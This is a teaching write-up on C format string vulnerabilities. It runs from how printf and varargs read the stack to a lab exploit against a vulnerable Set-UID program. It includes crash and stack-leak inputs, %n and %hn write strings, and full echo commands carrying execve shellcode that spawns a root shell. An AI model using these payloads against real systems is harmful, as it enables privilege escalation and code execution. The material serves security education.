# Format String Vulnerability


### Function with Variable Number of Arguments
An example is the C _printf()_ function, which accepts any number of arguments.
```c
#include <stdio.h>
int main() {
    int i = 1, j = 2, k = 3; 
    printf("print 3 numbers: %d, %d, %d\n", i,j,k);
}
```
This is because printf is defined as:
```c
int printf(const char *format, ...); 
```
The (...) in the parameter list indicates that zero or more optional arguments can be provided when the function is invoked. The optional arguments in C are accessed via the __stdarg__ macros defined in the _stdarg.h_ header file. 
```c
#include <stdio.h>
#include <stdarg.h>

void print2(int Narg, ...) {
    int i;
    va_list ap;
    va_start(ap, Narg);
    for (i = 0; i < Narg; i++) {
        printf("%d ", va_arg(ap, int));
        printf("%f\n", va_arg(ap, double));
    }
    va_end(ap);
}
int main() {
    print2(1, 2, 3.5);
    print2(2, 2, 3.5, 3, 4.5);
    return 0; 
}
```
When print2 is called (assuming the 32-bit x86 calling convention, where all arguments are passed on the stack), the arguments are pushed from right to left. For the second call they are pushed in the order 4.5, 3, 3.5, 2, 2, so Narg, pushed last, sits at the lowest address. The ```va_list``` pointer is used to access the optional arguments. Narg tells the function how many pairs to read, and the arguments are read in the __'reverse' order__ of pushing, from 2 to 4.5. The ```va_start()``` macro takes the address of Narg, calculates its size from its type, and sets the ```va_list``` pointer to address + size. So in this example the ``va_list`` pointer starts 4 bytes above Narg. <br>
The `va_list` pointer is advanced by the `va_arg(ap, <type>)` macro, where `<type>` determines how many bytes to move: 4 bytes up for an int, 8 bytes for a double, and so on. 

The `printf` function walks its arguments in a similar manner; the difference is that the type of each argument comes from the format string supplied by the caller. For example, `printf("print 3 numbers: %d, %d, %f\n", i, j, k)` declares that two int arguments and one floating-point argument (read as a double) follow. If the format string contains `%s`, the corresponding argument is treated as a pointer to a string. <br>
`printf` advances the `va_list` pointer only according to the format string. When an argument is missing, it still advances and prints whatever data sits at that memory location (even when it lies outside the current stack frame). 
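
To make the "format string drives the `va_list`" idea concrete, here is a minimal sketch of a printf-like formatter. The name `mini_format` and its return value are hypothetical, chosen for illustration; it handles only `%d`, `%s` and `%%`, and it is not how any real libc implements printf.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: formats into `out` (capacity `cap`) and returns how
 * many arguments were fetched from the va_list. Every fetch is triggered by
 * a directive in `fmt`; nothing checks that the caller really passed it. */
int mini_format(char *out, size_t cap, const char *fmt, ...) {
    va_list ap;
    size_t used = 0;
    int fetched = 0;

    if (cap == 0) return 0;
    out[0] = '\0';
    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < cap; p++) {
        if (*p != '%') {              /* ordinary character: copy it */
            out[used++] = *p;
            out[used] = '\0';
            continue;
        }
        p++;                          /* look at the character after '%' */
        if (*p == '\0') break;        /* lone '%' at the end of the string */
        int n;
        if (*p == 'd') {              /* fetch 4 bytes as an int */
            n = snprintf(out + used, cap - used, "%d", va_arg(ap, int));
            fetched++;
        } else if (*p == 's') {       /* fetch a pointer and follow it */
            n = snprintf(out + used, cap - used, "%s", va_arg(ap, const char *));
            fetched++;
        } else {                      /* "%%" or unknown: copy literally */
            n = snprintf(out + used, cap - used, "%c", *p);
        }
        if (n < 0 || (size_t)n >= cap - used) break;  /* output truncated */
        used += (size_t)n;
    }
    va_end(ap);
    return fetched;
}
```

Calling `mini_format(buf, sizeof buf, "ID: %d, Name: %s", 100, "Bob")` fetches two arguments. Passing a format with more directives than arguments would make it read past the supplied arguments, which is the same undefined behavior the real `printf` exhibits.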

```c
#include <stdio.h>
int main()
{
    int id =100, age=25; char *name = "Bob";
    printf("ID: %d, Name: %s, Age:%d\n", id, name);
}
```
This program's printf is missing the argument for `Age`, which should be an int. The printf function will still read the 4 bytes at the next `va_list` position, even though no argument was placed there.
* The compiler will generate a warning for this case, but the program still compiles. 

This leaves room for an exploit: if a user can control the format string, they can make printf read or write the program's memory, potentially leading to arbitrary code execution and privilege escalation. The following three cases are examples where user-controlled data ends up in the format string.
* `printf(user_input);`
* `sprintf(format, "%s %s", user_input, ": %d");
  printf(format, program_data);`
* `sprintf(format, "%s %s", getenv("PWD"), ": %d" );
  printf(format, program_data);`
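
One way to see why these patterns are dangerous is to count how many arguments a given string would make printf fetch. The sketch below is a simplified illustration: `count_fetching_directives` is a hypothetical helper, and it deliberately ignores details such as `*` widths, which fetch an extra argument.

```c
#include <stddef.h>

/* Hypothetical helper: count the directives in `fmt` that would make printf
 * fetch an argument. "%%" prints a literal '%' and fetches nothing.
 * Simplification: flags, width, precision and '*' are not parsed. */
size_t count_fetching_directives(const char *fmt) {
    size_t count = 0;
    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') {    /* escaped percent sign: skip both characters */
            p++;
            continue;
        }
        if (p[1] != '\0') count++;   /* a directive follows the '%' */
    }
    return count;
}
```

For `printf(user_input)` the number of arguments actually supplied is zero, so any input for which this count is greater than zero makes printf read values the program never passed.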

### Experiment Setup 
```c
#include <stdio.h>

void fmtstr() {
    char input[100];
    int var = 0x11223344;
    
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var); 
    printf("enter a string: "); 
    fgets(input, sizeof(input)-1, stdin);
    printf(input); //vulnerable 
    printf("Data at target address: 0x%x\n", var);
}

int main() { fmtstr(); return 0; }
```

Stack layout for the program is as follows:
![fstack1](./image_files/fstack1.png)

We compile the program, make it a root-owned Set-UID program, and turn off address space randomization: 
```
gcc -o vul vul.c
sudo chown root vul
sudo chmod 4755 vul 
sudo sysctl -w kernel.randomize_va_space=0 
```

### Attacks 

#### Attack 1: Crash the Program 
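With enough format specifiers, the `va_list` pointer moves past printf's own arguments into fmtstr()'s stack frame and beyond. Each `%s` treats the 4-byte value it fetches as an address and prints the string stored there; if the value is not a valid address, the program crashes. A sample input is simply `%s%s%s%s%s%s%s%s%s`, which is likely to trigger a segmentation fault. 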

#### Attack 2: Print out Data on Stack 
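With the `%x` format specifier one can print data on the stack: each `%x` tells printf to print the 4-byte value at the current `va_list` position as a hexadecimal integer and then advance the pointer. For example, an input such as `%x.%x.%x.%x` prints four consecutive words from the stack.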

#### Attack 3: Change Program Data in Memory
![fstack2](./image_files/fstack2.png)
* __The %n option__: 
    when `printf("hello%n", &i)` is executed, it stores the integer 5 (the number of characters printed so far) at the provided memory address, which is the address of variable i. In general, when printf() sees `%n`, it takes the value that the `va_list` pointer points to, treats it as an address, and writes the number of characters printed so far to that address. 
* __Insert Input into a File__: 
    The target address could be obtained via gdb, for example; say it is 0xBFFFF304. This address must be part of the input string so that it ends up on the stack, and because it contains non-printable bytes we write the input to a file instead of typing it. Suppose we know that it takes five `%x` directives to move the `va_list` pointer from its starting position to the beginning of the input string. 
```
echo $(printf "\x04\xF3\xFF\xBF").%x.%x.%x.%x.%x.%n > input
```
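The address is written in little-endian byte order. The `$(...)` part is a command substitution: the shell runs the inner printf command and replaces it with its output, so the input begins with the four raw bytes of the address we want. Since `%n` must be processed exactly __when the `va_list` pointer points at the target memory address__ stored in the input, we put five `%x` in front of it.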
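
The byte order used in the input can be checked with a few lines of C. This is a small sketch; `encode_le32` is a hypothetical helper name, not part of the original exploit.

```c
#include <stdint.h>

/* Hypothetical helper: store a 32-bit address in the byte order in which a
 * little-endian x86 machine keeps it in memory (least significant byte first). */
void encode_le32(uint32_t addr, unsigned char out[4]) {
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}
```

For the address 0xBFFFF304 this yields the bytes `04 f3 ff bf`, matching the escape sequences passed to the shell's printf.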


```
./vul < input 
```
Feeding this file to the program triggers the attack: the target variable is overwritten with the number of characters printed before printf() reaches `%n`. 
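
The behavior of `%n` can be observed safely in a program that passes a legitimate pointer. The sketch below assumes a libc that honors `%n` in a constant format string (glibc does; some hardened libraries disable it). `chars_before_n` is a hypothetical name.

```c
#include <stdio.h>

/* Returns the value that %n stores: the number of characters produced
 * before the %n directive was reached. */
int chars_before_n(void) {
    char sink[32];
    int written = -1;   /* overwritten by %n */
    snprintf(sink, sizeof sink, "hello%n, world", &written);
    return written;
}
```

Here `%n` receives `&written`, so the count (5, for `hello`) lands in a local variable. In the attack the pointer is instead a value the attacker placed on the stack.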

#### Attack 4: Change Program Data to Specific Value 
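One can use the _precision modifier_ and _width modifier_ to control how many characters are printed before `%n`, and therefore the value that `%n` writes. However, writing a large value in a single step is inefficient, because that many characters must actually be printed. The length modifiers let us write fewer bytes at a time: <br>
* `%n`: treat the argument as a pointer to a 4-byte integer.
* `%hn`: treat the argument as a pointer to a 2-byte short; only the 2 least significant bytes of the count are written.
* `%hhn`: treat the argument as a pointer to a 1-byte char; only the least significant byte of the count is written.

Our goal is to rewrite the variable stored at memory location 0xBFFFF304, which is initially 0x11223344, to 0x66887799. We can modify the memory 2 bytes at a time by breaking the target into two parts (the machine is little-endian, so the low half comes first in memory): 
* the first part is a 2-byte short at address 0xBFFFF304, which must become 0x7799
* the second part is a 2-byte short at address 0xBFFFF306, which must become 0x6688 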

```c
"\x06\xf3\xff\xbf@@@@\x04\xf3\xff\xbf_%x_%x_%x_%x_%x%hn_%x%hn"
```
This string is the input: the two addresses are placed at the beginning of the format string, so they are stored on the stack. The address 0xBFFFF306 comes first because it receives the smaller value, and the printed count can only grow. Because the 4 bytes `@@@@` sit between the two addresses, there is an extra `%x` between the two `%hn` to move the `va_list` pointer past them. <br>
* Then, we use precision modifiers to control the values written. If we use `_%.8x` for the first four `%x`, then 12 + 5 + 32 = 49 characters have been printed by the time we reach the fifth `%x` (12 bytes for the two addresses and `@@@@`, 5 underscores, and 4 × 8 hex digits). To reach 0x6688, or 26248, we need 26199 more characters, so the fifth `%x` gets its precision set to 26199. <br>
* Then, we write to the second address, which should receive the value 0x7799. This is why we put `@@@@` in between: it gives the extra `%x` a 4-byte value to consume, and that `%x` carries the precision that raises the count. The difference between 0x7799 and 0x6688 is 4369, so we use 4368 as the precision, since one '_' is printed before it. This brings the total number of printed characters to 0x6688 + 4369 = 0x7799, so when we reach the second `%hn`, the value 0x7799 is written to the second address. The resulting command is: 
```
echo $(printf "\x06\xf3\xff\xbf@@@@\x04\xf3\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.26199x%hn_%.4368x%hn > input 
```
The following image specifies the process. 
![fstring](./image_files/fstring.png)
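
The character counts can be double-checked with a benign replay of the same format string. This is a sketch under stated assumptions: `AAAA` and `BBBB` stand in for the two 4-byte addresses, the `%x` arguments are arbitrary constants rather than stack words, and `%n` writes into local ints instead of `%hn` writing through attacker-chosen addresses. `replay_counts` is a hypothetical name.

```c
#include <stdio.h>

/* Replays the layout of the Attack 4 input and records the printed-character
 * count at the two positions where the real input has %hn. */
void replay_counts(int *first, int *second) {
    static char sink[32768];   /* large enough for the 30617 characters */
    snprintf(sink, sizeof sink,
             "AAAA@@@@BBBB_%.8x_%.8x_%.8x_%.8x_%.26199x%n_%.4368x%n",
             1u, 2u, 3u, 4u, 5u, first, 6u, second);
}
```

After the call, `*first` holds 0x6688 (26248) and `*second` holds 0x7799 (30617), which are the two halves the attack writes.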

#### Attack 5: Code Injection (Finally, shellcode)

Four challenges:
* Inject the code onto the stack
* Find the starting address of the injected code (say it is A)
* Find where the return address is stored (say it is B)
* Write the value A to the memory at B

The first three challenges can be met using the gdb debugger and experimentation; the shellcode can be appended to the end of the format string. Suppose we found that the return address is stored at 0xBFFFF38C, and the entry point of the injected shellcode is 0xBFFFF358. So we need to write the value 0xBFFFF358 to address 0xBFFFF38C. <br>
With the same technique, we split the write into two `%hn` chunks, one at 0xBFFFF38C and one at 0xBFFFF38E. On a little-endian machine the high half 0xBFFF goes to 0xBFFFF38E and the low half 0xF358 goes to 0xBFFFF38C; since 0xBFFF is the smaller value, it is written first. <br>
The input is thus written as: 
```
echo $(printf "\x8e\xf3\xff\xbf@@@@\x8c\xf3\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.49102x%hn_%.13144x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80") > input 
```
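
The two precision values follow mechanically from the target value. The sketch below shows one way to derive them; `struct hn_plan` and `plan_hn_writes` are hypothetical names, and the function assumes a little-endian target, two halves that differ, a smaller half larger than `printed_before`, and exactly one separator character between the first `%hn` and the second padded `%x`, as in the input above.

```c
#include <stdint.h>

/* Hypothetical planning helper for a two-step %hn write. */
struct hn_plan {
    uint32_t first_addr;    /* address written by the first %hn   */
    uint32_t second_addr;   /* address written by the second %hn  */
    unsigned first_pad;     /* precision of the %x before the first %hn  */
    unsigned second_pad;    /* precision of the %x before the second %hn */
};

/* `printed_before` is the number of characters already printed when the
 * first padded %x is reached (49 in the layout used here). */
struct hn_plan plan_hn_writes(uint32_t target, uint32_t value,
                              unsigned printed_before) {
    unsigned low = value & 0xffffu;   /* stored at target     */
    unsigned high = value >> 16;      /* stored at target + 2 */
    struct hn_plan p;

    /* The printed count only grows, so the smaller half is written first. */
    if (high < low) {
        p.first_addr = target + 2;
        p.second_addr = target;
        p.first_pad = high - printed_before;
        p.second_pad = low - high - 1;   /* minus the one separator */
    } else {
        p.first_addr = target;
        p.second_addr = target + 2;
        p.first_pad = low - printed_before;
        p.second_pad = high - low - 1;
    }
    return p;
}
```

With `target = 0xBFFFF38C`, `value = 0xBFFFF358` and `printed_before = 49`, the plan writes to 0xBFFFF38E first with padding 49102, then to 0xBFFFF38C with padding 13144.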

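If we run the program with the input above, we do not get a usable shell, because the program's stdin is redirected from the input file, so the shell reads end-of-file and exits immediately. The workaround is to have the shellcode execute a separate shell script that redirects stdin back to the terminal: 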
```
echo $(printf "\x8e\xf3\xff\xbf@@@@\x8c\xf3\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.49102x%hn_%.13144x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68/bad\x68/tmp\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80") > input 
```
Here the shellcode executes a shell script stored at `/tmp/bad` (the two pushes, `/bad` and then `/tmp`, leave the string `/tmp/bad` on the stack), which contains:
```
#!/bin/sh
/bin/sh 0<&1 
```
This invokes a shell that uses the terminal as its standard input: `0<&1` duplicates file descriptor 1 (standard output, which is still the terminal) onto file descriptor 0 (standard input).